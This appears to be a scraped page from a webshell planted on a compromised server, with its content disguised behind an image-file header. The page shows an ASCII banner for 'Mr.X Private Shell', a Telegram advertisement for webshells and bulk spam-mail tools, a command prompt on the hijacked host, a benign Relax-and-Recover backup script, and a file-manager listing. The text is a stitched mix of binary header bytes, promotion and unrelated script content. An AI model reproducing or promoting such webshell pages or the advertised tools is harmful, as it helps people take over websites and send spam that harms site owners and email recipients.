����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Ensure we start from a known-clean initial state.
# E.g. request reboot before launching another workflow if 'mountonly' has
# been run already, except in certain cases.
#
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.

# Define our breadcrumb
BREADCRUMB="$VAR_DIR/last_run_workflow"
local last_run=""

if test -r "$BREADCRUMB"; then
    last_run=`cat $BREADCRUMB`
    case $last_run in
        mountonly)
            case $WORKFLOW in
                restoreonly|finalizeonly)
                    # allowed sequence of subsequent workflows after 'mountonly' was run
                    ;;
                *)
                    Error "The '$last_run' workflow was run. Disk state no longer clean. Reboot to run '$WORKFLOW' from clean disk state."
                    ;;
            esac
    esac
fi

Filemanager

Name Type Size Permission Actions
002_clean_start.sh File 902 B 0644
005_ssh_agent_start.sh File 910 B 0644
007_set_dmesg_level.sh File 2.68 KB 0644
010_pre_recovery_script.sh File 467 B 0644